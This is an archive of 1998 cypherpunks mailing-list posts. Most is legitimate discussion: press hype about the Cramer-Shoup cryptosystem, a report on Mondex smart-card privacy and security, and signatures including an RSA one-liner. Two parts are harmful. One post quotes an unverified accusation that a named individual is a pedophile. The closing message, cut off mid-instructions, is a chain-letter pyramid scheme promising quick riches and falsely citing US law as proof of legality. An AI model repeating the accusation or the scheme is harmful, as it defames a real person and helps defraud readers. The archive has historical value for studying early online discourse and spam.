Pik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxG
T05UIFNJWkU9KzE+Q2VsbCBQaG9uZSBVc2VyIFNhdmVzClUuSy4gU3dpbW1l
cjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij5BIG1hbiBndWlkZWQgY29hc3RndWFyZHMgdG8gYSBzd2ltbWVyCmluIHRy
b3VibGUgb2ZmIEJyaXRhaW4ncyBTdWZmb2xrIGNvYXN0IHdpdGggaGlzIG1v
YmlsZSBwaG9uZS4gKDxBIEhSRUY9Imh0dHA6Ly9uZXdzLmJiYy5jby51ay9o
aS9lbmdsaXNoL3VrL25ld3NpZF8xNTYwMDAvMTU2MjgzLnN0bSI+QkJDPC9B
Pik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0tMT5Gb3IgYWRkaXRpb25hbCBuZXdzIGFi
b3V0CnRoZSB3aXJlbGVzcyBpbmR1c3RyeS0taW5jbHVkaW5nIHBlcmlvZGlj
IG5ld3MgdXBkYXRlcyB0aHJvdWdob3V0IHRoZSBkYXktLXZpc2l0CjxBIEhS
RUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0dHA6Ly93d3cud293LWNv
bS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5DVElBIERh
aWx5IE5ld3MgZnJvbSBXT1ctQ09NCmlzIHRyYW5zbWl0dGVkIHdlZWtkYXlz
LCBleGNlcHQgZm9yIGhvbGlkYXlzLiBWaXNpdCB1cyBvbiB0aGUgV29ybGQg
V2lkZQpXZWIgYXQgPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9w
cm9mZXNzaW9uYWwiPmh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lv
bmFsPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPklmIHlvdSBh
cmUgbm90IGludGVyZXN0ZWQKaW4gcmVjZWl2aW5nIHRoZSBDVElBIERhaWx5
IE5ld3MgZnJvbSBXT1ctQ09NLCBwbGVhc2Ugc2VuZCBhIG1lc3NhZ2UgdG8K
PEEgSFJFRj0ibWFpbHRvOnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVu
aXR5bWFpbC5jb20iPnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5
bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48
Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0
eW1haWwuY29tIgptdXN0IGJlIGxpc3RlZCBpbiB0aGUgVE8gc2VjdGlvbiBv
ZiB0aGUgZW1haWwuPC9GT05UPjwvRk9OVD4gKioqPC9CPiZuYnNwOwoKPFA+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPlBs
ZWFzZSBOb3RlOiBTb21lIG9mIHRoZQpsaW5rcyBpbiB0b2RheSdzIG5ld3Mg
YXJlIHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9zZSBsaW5rcyBtYXkgbm90
IGJlCmF2YWlsYWJsZSBhcyBuZXdzIGNoYW5nZXMgdGhyb3VnaG91dCB0aGUg
ZGF5LiZuYnNwOyBBbHNvLCBzb21lIG5ld3Mgc291cmNlcwptYXkgYmUgc3Vi
c2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgcmVnaXN0cmF0aW9uLjwvRk9O
VD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+CjwvVEFCTEU+CiZuYnNwOzwvY2VudGVyPgo8L0JPRFk+CjwvSFRNTD4K
--Boundary..3995.1071713795.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fade <fade@mail1.i1.net>
Date: Mon, 24 Aug 1998 11:04:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "Unbreakable Crypto" announcement??
Message-ID: <Pine.BSI.3.95.980824130502.222A-100000@mail1.i1.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone with access to the Financial Times know what the hell this
snippet is talking about??

-=fade=-

ENCRYPTION BREAKTHROUGH ANNOUNCED TODAY
August 24, 1998

     According to the Financial Times a new "unbreakable" encryption
technology, called the "Cramer-Shoup cryptosystem," will be annouced today
by mathematicians from the International Federal Institute of Technology
which supposedly will thwart even the most aggressive Internet hackers.
They claim to have created the first "unbreakable protection" which would
reportedly be a breakthrough that could ensure the security of electronic
commerce. The Financial Times said, "The breakthrough comes amid growing
anxiety about the vulnerability of Internet transactions since the 
discovery by researchers earlier this year of a new way to break through
even the strongest encryption systems."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Mon, 24 Aug 1998 11:42:46 -0700 (PDT)
To: Fade <fade@mail1.i1.net>
Subject: Re: "Unbreakable Crypto" announcement??
In-Reply-To: <Pine.BSI.3.95.980824130502.222A-100000@mail1.i1.net>
Message-ID: <199808241850.NAA025.68@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.BSI.3.95.980824130502.222A-100000@mail1.i1.net>, on 08/24/98 
   at 01:08 PM, Fade <fade@mail1.i1.net> said:

>Does anyone with access to the Financial Times know what the hell this
>snippet is talking about??

>-=fade=-

>ENCRYPTION BREAKTHROUGH ANNOUNCED TODAY
>August 24, 1998

>     According to the Financial Times a new "unbreakable" encryption
>technology, called the "Cramer-Shoup cryptosystem," will be annouced
>today by mathematicians from the International Federal Institute of
>Technology which supposedly will thwart even the most aggressive Internet
>hackers. They claim to have created the first "unbreakable protection"
>which would reportedly be a breakthrough that could ensure the security
>of electronic commerce. The Financial Times said, "The breakthrough comes
>amid growing anxiety about the vulnerability of Internet transactions
>since the  discovery by researchers earlier this year of a new way to
>break through even the strongest encryption systems."


Well this marketing hype just reeks of snake-oil.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: "Luke!  I'm your father!"  Bill Gates, 1980

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeG13Y9Co1n+aLhhAQHtywP+MyYcNJseJVW3mWFBpBIaW8Eed2Lf4iuL
NnsQG1sYZch2DUU7tdagFCsVBwrFrG1IxxaqMfPOkuulS9wnWlYWrkXufYeq+34u
NqwtSjouzWVUNJ3f8AmElndnNehwvd43STUEll6ncbAJmFAP4sdLNqhxIAUFlJTm
geKj7L4k/Ps=
=TvTQ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Mon, 24 Aug 1998 12:34:57 -0700 (PDT)
To: Fade <fade@mail1.i1.net>
Subject: Re: "Unbreakable Crypto" announcement??
In-Reply-To: <Pine.BSI.3.95.980824130502.222A-100000@mail1.i1.net>
Message-ID: <v03102800b2076d9f43cb@[192.168.3.63]>
MIME-Version: 1.0
Content-Type: text/plain


>Does anyone with access to the Financial Times know what the hell this
>snippet is talking about??
>
>-=fade=-
>
>ENCRYPTION BREAKTHROUGH ANNOUNCED TODAY
>August 24, 1998
>
>     According to the Financial Times a new "unbreakable" encryption
>technology, called the "Cramer-Shoup cryptosystem," will be annouced today
>by mathematicians from the International Federal Institute of Technology
>which supposedly will thwart even the most aggressive Internet hackers.
>They claim to have created the first "unbreakable protection" which would
>reportedly be a breakthrough that could ensure the security of electronic
>commerce. The Financial Times said, "The breakthrough comes amid growing
>anxiety about the vulnerability of Internet transactions since the
>discovery by researchers earlier this year of a new way to break through
>even the strongest encryption systems."

Who would have guessed that a journalist would so grievously misrepresent
the claims of a soberly presented scholarly report? The title of the
technical paper is: "A Practical Public Key Cryptosystem Provably Secure
against Adaptive Chosen Ciphertext Attack". The only new claim is security
against a chosen ciphertext attack, not "unbreakable". The specific
internet angle is that an attacker might have access to a "decryption
oracle" due to the nature of high volume anonymous transactions. If one
could slip through a few million adaptively chosen ciphertexts, current
systems could leak enough information to compromise themselves. The
reported results are for a new proposed system that is not vulnerable to
this sort of attack.

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Mon, 24 Aug 1998 12:22:27 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: "Unbreakable Crypto" announcement??
In-Reply-To: <Pine.BSI.3.95.980824130502.222A-100000@mail1.i1.net>
Message-ID: <v04003a01b2076a1329bc@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain


	Fade <fade@mail1.i1.net> asked the Listocracy:

>>Does anyone with access to the Financial Times know what the hell this
>>snippet is talking about??

>>ENCRYPTION BREAKTHROUGH ANNOUNCED TODAY
>>August 24, 1998  <snip>

	Having read the FT, WHG III  <whgiii@openpgp.net> growled:

>Well this marketing hype just reeks of snake-oil.

	It may be rash to condemn or dismiss a cryptographic proposal just
because corporate PR is unable to coherently explain the work. Cramer and
Shoup are serious players, and they are presenting a paper on their work at
Crypto98 today. The technical paper can be viewed at:
<http://www.zurich.ibm.com/Technology/Security/publications/1998/CS.pdf>

	For more uninformative PR, see:
<http://biz.yahoo.com/bw/980824/ibm_resear_1.html>

	IBM (Shoup's employer) offers a PR contact: Mike Ross, at IBM
Research, e-mail: mikeross@almaden.ibm.com  [Tel: 408/927-1283]

	Suerte,
		_Vin

-----
      Vin McLellan + The Privacy Guild + <vin@shore.net>
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
                         -- <@><@> --






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@video.avwashington.com>
Date: Mon, 24 Aug 1998 12:25:32 -0700 (PDT)
To: Fade <fade@mail1.i1.net>
Subject: Re: "Unbreakable Crypto" announcement??
In-Reply-To: <Pine.BSI.3.95.980824130502.222A-100000@mail1.i1.net>
Message-ID: <Pine.LNX.3.95.980824152220.29295B-100000@video.avwashington.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 24 Aug 1998, Fade wrote:

> 
> Does anyone with access to the Financial Times know what the hell this
> snippet is talking about??
> 
> -=fade=-
> 
> ENCRYPTION BREAKTHROUGH ANNOUNCED TODAY
> August 24, 1998
> 
>      According to the Financial Times a new "unbreakable" encryption
> technology, called the "Cramer-Shoup cryptosystem," will be annouced today

check out http://www.cs.wisc.edu/~shoup/papers/

> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M Taylor <mctaylor@privacy.nb.ca>
Date: Mon, 24 Aug 1998 12:25:38 -0700 (PDT)
To: cryptography@c2.net
Subject: summary of recent meeting with top Mondex officials (fwd)
Message-ID: <Pine.LNX.3.95.980824162535.18129E-100000@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Sender: efc-talk-owner@insight.cas.mcmaster.ca
Subject: summary of recent meeting with top Mondex officials
Date: Mon, 24 Aug 1998 14:07:40 -0400 (EDT)
To: efc-talk@insight.cas.mcmaster.ca
From: David Jones <djones@insight.cas.mcmaster.ca>

	Mondex meeting

I would like to give a brief synopsis of the meeting
that I attended two Fridays ago (August 14th) in Toronto.
Present were:

 Joanne De Laurentiis,  President & CEO, Mondex Canada
 David Phillips,  Vice-President, General Counsel, Mondex Canada
 Deen Farouk,  Director, Mondex Canada
 Mark Tonnesen,  Executive Vice-President, Card Services, Royal Bank
 David Braidwood,  Senior Manager, Standards and Security, Royal Bank
 Martyn Cooper,  Senior Manager, Smart Card Industry, Royal Bank
 Ann Cavoukian,  Privacy Commissioner of Ontario
 Carol Markusoff,  Policy Analyst, Ontario Privacy Commission
 Peter Hope-Tindall,  XL Consulting, Special Advisor to Privacy Commissioner
 David Jones, President,  Electronic Frontier Canada


The purpose of the meeting was to have an open discussion
about privacy and security of the Mondex electronic payment system.
As most of you probably know, Mondex value can be transfered between
smart-cards to make purchases and new value can be downloaded onto the
cards from bank ATMs or over the phone.

For some (highly critical) background, please see:
   "Mondex: A House of Smart-Cards?"
      http://www.efc.ca/pages/media/convergence.12jul97.html

What actually prompted the meeting was an article that appeared
this summer in the June issue of the Financial Post Magazine.

   "Mondo Mondex"
      http://www.efc.ca/pages/media/financial-post-magazine.01jun98.html

The meeting got off to an amusing start as two bankers remarked
that I wasn't wearing a tie, although I must say I thought I was
dressed quite fashionably, ... for a professor.  I made some remark
about "casual Fridays", but it didn't seem to help.  The fact that
I had taken a *bus* in from Hamilton that morning also seemed to be
another clear indication to all present that I didn't hang around in the
same circles as these senior bankers.  I must say, it was a very cordial,
informative, and interesting meeting.  Everyone was quite charming and
clearly expert in their own fields.

They outlined the different roles that the banks and Mondex play
in the system, including a separate corporate entity called the
"Mondex Canada Originator" that actually "prints money", in the
sense that it issues *new* value on Mondex cards.  This is the only
place this occurs: the banks, merchants, and consumers merely push
value around in the system, from card to card.

Interestingly, the "Mondex Canada Originator" is not recognized as a bank,
and is not even recognized as a financial institution by Canadian authorities.
The "float", the account holding real Canadian dollars to back up "value"
stored on cards, is invested to earn a profit, but is *not* backed up
by any federal deposit insurance.

The current implementation of the Mondex system uses a well-known
"symmetric" encryption algorithm for security, implemented on a
Hitachi H8/3102 chip.  Interestingly, the value of transactions
is transferred "in the clear" between cards.  Encryption is used
for digital signatures.  Each card has a transaction log that
stores the following information about up to 10 transactions:

   PID,AMT,NAR,AMT,CUR,TIM,SEQ1,SEQ2

   PID = purse ID of the *other* card
   NAR = 12 characters of "narrative" information (e.g. customer/vendor name)
   AMT = amount of value transferred
   CUR = currency used
   TIM = timestamp (from retail machine or consumer wallet, may be inaccurate)
   SEQ1= unique transaction sequence number for *this* purse
   SEQ2= unique transaction sequence number for the *other* purse

It's at this point that the privacy commissioner, Ann Cavoukian,
started asking questions about how this transaction data gets used.
Although merchant terminals are able to capture all of this information,
and even have a modem to transmit it back to banks, we were told that
this is not done in Guelph, in part because there is not (yet) any software
on the bank end to process the data.  There was also the suggestion that,
in the future, Mondex might choose to rely on contractual limitations
on the use of the data to prevent some vendors (e.g., Walmart) from using
the information for data mining.  I am fairly willing to accept that there
are not any terrible privacy problems with Mondex in Guelph *today*,
but it is much more murky when we look to the future and imagine
how the system may eventually be used.

When discussing security and the potential for "hackers" to create
counterfeit Mondex value, it became apparent that the banks themselves
are doing nothing at all to deal with security.  It seems to me that a
good analogy could be made with how banks deal with credit cards:
They depend on the credit card company to worry about security and fraud.
With Mondex, the banks are relying on the chip's use of encryption
and their "tamper-resistance" (meaning they are supposed to lock up
if you mess around with them).  Only the "Mondex Canada Originator"
has a "crude" risk management system, which monitors that balance of funds
sitting in the "float" account and monitors uploads and downloads
between banks and merchants/customers.  If usage patterns deviates
outside normal fluctuations, on the order of 3-4%, then an alarm is
raised to investigate.  In the Guelph pilot, this alarm has gone off
"about 5 times", (false alarms, since there has not been any fraud).

In the "unlikely" scenario, that counterfeit Mondex value is created,
the system is supposed to be able to contain the flow of fraudulent
value and limit the damage that might occur.  It is surrounding this
point that there seems to be a great deal of confusion and contradictory
information coming from Mondex.  For instance, on their web site, Mondex says:

    Detection: On-Chip Security
    The Mondex chip has its own risk management measures, built-in to
    the chip itself.  The chips are programmed to automatically react
    to 'unusual' card behaviour, such as very high levels of value
    redemption and temporarily close down.

    URL= http://www.mondex.com/mondex/cgi-bin/...
         .../printpage.pl?fname=../documents/detection.txt&doctype=genp

Well, as far as I can tell, based on what I heard at the meeting,
the statement above is not correct.

On a related page, Mondex says:

    Recovery: Rogue Cards
    Naturally cards identified as being unauthorised, reported stolen,
    or potentially fraudulent can delinked immediately from the
    banking system.

    URL= http://www.mondex.com/mondex/cgi-bin/...
         .../printpage.pl?fname=../documents/recovery.txt&doctype=genp

It turns out this statement, as far as I can tell, is also not correct.
The "Mondex Canada Originator" has no authority and no technical ability
to "delink" a card.  The Banks also seem to lack the ability to
remotely deactivate cards through their ATMs.  I asked how many times
cards in Guelph had been locked out because of suspicious behaviour.
I was told "zero times".

On an interesting technical note, we were told that Mondex cards use
a seven-step protocol to transfer value from one card to another.
It is not possible to "create" value by interrupting a transaction,
but it is possible to "destroy" value, if one card has debited its value
records before the other has credited its value.  In such a case,
the card is supposed to keep a record of this "exception", so the bank
can later re-imburse the consumer for the lost value.  We were told that
approximately $4,600 has been paid out to customers for such failed
transactions.  To put this in context, so far about $2 million has been
issued on Mondex cards in the 18 month pilot study, so this means
roughly 0.25% of value gets destroyed by errant transactions.

The discussion about security explored various "scenarios" about
how someone might try to extract value from the system, assuming that
it was even possible to "hack" a Mondex card.  This so exasperated
the Exec VP with the Royal Bank, Mark Tonnesen, that he turned to me
and said, "Look, I'll pay you $100,000 if you can create fake Mondex value".

Hmmm, maybe I'll just take him up on his offer.  ;-) ;-)

-- David Jones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Prof. David G. Jones			president, Electronic Frontier Canada
McMaster University			email:  djones@efc.ca
Dept of Computer Science		web:	http://www.efc.ca/
1280 Main St West			office: +1 (905) 525-9140 ext. 24689
Hamilton, ON, Canada  L8S 4K1		fax:    +1 (905) 546-9995
-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mordy Ovits <movits@lockstar.com>
Date: Mon, 24 Aug 1998 13:43:56 -0700 (PDT)
To: Fade <fade@mail1.i1.net>
Subject: Re: "Unbreakable Crypto" announcement??
In-Reply-To: <Pine.BSI.3.95.980824130502.222A-100000@mail1.i1.net>
Message-ID: <35E1D201.82D41E98@lockstar.com>
MIME-Version: 1.0
Content-Type: text/plain


It's not snake oil (yet?), but the word unbreakable is lame.
check out a preliminary paper on it...
http://www.cs.wisc.edu/~shoup/papers/
Title A practical public key cryptosystem provably secure against adaptive
chosen ciphertext attack


Fade wrote:

> Does anyone with access to the Financial Times know what the hell this
> snippet is talking about??
>
> -=fade=-
>
> ENCRYPTION BREAKTHROUGH ANNOUNCED TODAY
> August 24, 1998
>
>      According to the Financial Times a new "unbreakable" encryption
> technology, called the "Cramer-Shoup cryptosystem," will be annouced today
> by mathematicians from the International Federal Institute of Technology
> which supposedly will thwart even the most aggressive Internet hackers.
> They claim to have created the first "unbreakable protection" which would
> reportedly be a breakthrough that could ensure the security of electronic
> commerce. The Financial Times said, "The breakthrough comes amid growing
> anxiety about the vulnerability of Internet transactions since the
> discovery by researchers earlier this year of a new way to break through
> even the strongest encryption systems."



--
o Mordy Ovits
o Programmer/Cryptographer
o LockStar Inc.
---------------------------------------------------------------------------
#!/usr/local/bin/python
from sys import*;from string import*;a=argv;[s,p,q]=filter(lambda x:x[:1]!=
'-',a);d='-d'in a;e,n=atol(p,16),atol(q,16);l=(len(q)+1)/2;o,inb=l-d,l-1+d
while s:s=stdin.read(inb);s and map(stdout.write,map(lambda i,b=pow(reduce(
lambda x,y:(x<<8L)+y,map(ord,s)),e,n):chr(b>>8*i&255),range(o-1,-1,-1)))






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@weathership.homeport.org>
Date: Mon, 24 Aug 1998 13:49:25 -0700 (PDT)
To: Chip Mefford <fade@mail1.i1.net>
Subject: Re: "Unbreakable Crypto" announcement??
In-Reply-To: <Pine.BSI.3.95.980824130502.222A-100000@mail1.i1.net>
Message-ID: <19980824165121.A16735@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Cramer & Shoup presented a paper this AM with some provable
properties; ie, if decisional DH is hard, then their system is hard as
well.

Adam


On Mon, Aug 24, 1998 at 03:22:42PM -0400, Chip Mefford wrote:
| On Mon, 24 Aug 1998, Fade wrote:
| > Does anyone with access to the Financial Times know what the hell this
| > snippet is talking about??
| > 
| > -=fade=-
| > 
| > ENCRYPTION BREAKTHROUGH ANNOUNCED TODAY
| > August 24, 1998
| > 
| >      According to the Financial Times a new "unbreakable" encryption
| > technology, called the "Cramer-Shoup cryptosystem," will be annouced today
| 
| check out http://www.cs.wisc.edu/~shoup/papers/
| 
| > 
| > 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mario Freamat <mario@pa.uky.edu>
Date: Mon, 24 Aug 1998 14:05:39 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <9808242055.AA02642@pa.uky.edu>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mario Freamat <mario@pa.uky.edu>
Date: Mon, 24 Aug 1998 14:04:07 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <9808242055.AA02645@pa.uky.edu>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mario Freamat <mario@pa.uky.edu>
Date: Mon, 24 Aug 1998 14:03:59 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <9808242056.AA02648@pa.uky.edu>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/4.05 [en] (X11; U; SunOS 5.4 sun4m)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jason roks <downloads@hlserver.com>
Date: Tue, 25 Aug 1998 13:59:32 -0700 (PDT)
To: cypherpunks@toad.com ()
Subject: PC Beta Download (was Re: Download Info (Form) PC)
In-Reply-To: <199808242238.SAA11737@sol00320.dynamicweb.net>
Message-ID: <v0311075bb207a48bbacb@[207.245.14.171]>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Thanks for checking out Hotline. We hope you enjoy our software and tell
all your friends. Please check back at our web site for the latest news
about Hotline Communications Ltd.

To purchase licenses for Hotline software please visit our secure
transaction server at http://www.HotlineSW.com

If you experienced any difficulties downloading the evaluation software you
can try again from our secondary distribution server:
ftp://ftp.hlserver.com

If you have any technical questions please contact mailto:support@HotlineSW.com

kindest regards,

jr
--




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
jason roks

business development
HOTLINE COMMUNICATIONS LTD.
tel: 416.531.7804

jason@HotlineSW.com

http://www.HotlineSW.com
HOTLINE office: hlserver.com (207.245.14.170)
HOTLINE Tracker: hltracker.com (207.245.14.170)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"There is more than the web!."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LDCS143@aol.com
Date: Mon, 24 Aug 1998 16:55:29 -0700 (PDT)
Subject: Hey
Message-ID: <82410017.35e1f9ce@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: LDCS143@aol.com
Subject: Hey
From: LDCS143@aol.com
Date: Mon, 24 Aug 1998 19:29:27 EDT

Hi-my name is Chris; I have been through this program 2 times already...  you
have no idea how profitable it is.  It is definitely the fastest thing
available.  We are talking' about thousands of dollars in 2 weeks time... send
it to as many as you can (even though it says 20...  trust me) I've-bought a
car, taken the kids to Florida (Disney), upgraded my CPU, and next on the list
is buying a nicer home...  GOOD LUCK...  you can't lose!

Don't JUDGE TOO quickly this might be the answer to all of your problems!

If you need to make a few thousand dollars REALLY FAST, then please take a
moment to read this simple program I am sharing with you.  No, it is NOT what
you think!  YOU DO NOT have to send $5.00 to five people to buy a report, buy
a recipe, or any other product.  Nor will you need to invest more money later
to get things going.  THIS IS THE FASTEST, EASIEST PROGRAM YOU WILL EVER DO!
Complete it in ONE HOUR and you will never forget the day you first received
it.  If you are doing other programs, by all means stay with them, but do this
program as well if you CAN'T WAIT two to three months while you other programs
start to work for you.

The following is a plan to benefit you and your future.  To those interested
in at home minimal work to earn profits- this is a great option and much less
complicated than the average ad seen in classifieds for "email processor."

BE PREPARED TO GET EXCITED...  YOU WON'T BE DISAPPOINTED!  
******************************************************************************
********
Read the following and you will agree this is a very exciting opportunity.
Only invest a little bit of time and your reward could mean thousands of
dollars!  Good luck!
________________________________________________________

"IT'S OUTRAGEOUS!  With 2 hours of work I have made over US $11,000.00 in the
last three weeks... and my investment was just US$5.00!  I LOVE IT!  THANK YOU
11,000 X's!"
                      						-Julie M. St. Louis
________________________________________________________________      

  $$$ ARE YOU IN NEED OF MONEY? RIGHT NOW? $$$
 $$$ HOW DOES US$10,000 IN TWO (2) WEEKS (or less) SOUND? $$$
 
Don't laugh!  Try this for a change while you wait for the others to start
working.  One (1) hour of work to get started and NO MAILING LISTS!
 
               --------Esquire Marketing Newsletter Gift Club--------

******************************************************************************
********
Note: This is a service and is 100% legal (Refer to US Postal & Lottery Laws,
Title 18, Sections 1302 and 1341 or Title 18, Section 3005 in the US code,
also in the Code of Federal Regulations, Volume 16, Sections 255 and 436,
which state that "a product or service must be exchanged 
for money received.")

                           --------This Is How It Works--------
 
Unlike many other programs, this three-level program is more realistic and
much, much faster.  Because it is so easy, the response rate for this program
is VERY HIGH and VERY FAST, and you will see results in two weeks or less!
Just in time for next month's bills!
 
You only mail out 20+ copies.  You should also send them to PEOPLE WHO SEND
YOU THEIR PROGRAMS because they know THESE PROGRAMS WORK and they are already
believers in the system!  Besides, this program is much, much FASTER and has a
HIGHER RESPONSE RATE.
 
Even if you are already in a program, STAY WITH IT, but do yourself a favor
and DO THIS ONE as well.  START RIGHT NOW!  It's simple and takes a very small
investment.  It will pay off long before other letters even begin to trickle
in!
 
                  Just give ONE person a US $5.00 gift.  That's all! 

Follow the simple instructions and in TWO WEEKS you will have US $10,000 in
your bank account! Because of the LOW INVESTMENT, SPEED and HIGH PROFIT
POTENTIAL, this program has a VERY HIGH RESPONSE RATE. JUST ONE (1) US$5.00
BILL. THAT'S YOUR INVESTMENT!
 
                   +------+ Follow These Simple Instructions +------+
 
1. On a blank sheet of paper write "Please add me to your mailing list." Write
your name and address clearly and include your Email address (if  you have
one) for future mailings and courtesy follow-ups.  Fold it around a US $5 bill
and send this to the FIRST name on the list (#1).  Only the FIRST PERSON on
the list gets YOUR NAME AND A FIVE-DOLLAR GIFT.
 
Note: This is a service and is 100% legal (Refer to US Postal & Lottery Laws,
Title 18, Sections 1302 and 1341 or Title 18, Section 3005 in the US code,
also in the Code of Federal Regulations, Volume 16, Sections 255 and 436,
which state that "a product or service must be exchanged 
for money received.")
 
2. Retype ONLY the list, REMOVING the FIRST (#1) NAME FROM THE LIST.  Move the
other two names UP and ADD YOUR NAME to the list in the THIRD (#3) position.
 
3. Send out 20+ copies of this letter.  Note: By sending this letter via
Email, the response time is much faster and you save the expense of envelopes,
stamps, and copying services.  Consider this, MILLIONS of 
people "surf the Internet" everyday, all day, all over the World! FIFTY
THOUSAND new people get on the Internet every month!  An excellent source of
names is the people who send you other programs, and the names listed on the
letter they send you.  Your contact source is UNLIMITED.  It boggles my mind
to think of all the possibilities!  Mail, or should I say Email, your letter
TODAY!  It's so easy, ONE HOUR of your time.  THAT'S IT!
 
To send your newsletter by Email:
 
 1. Go to "Edit" and "Select All"
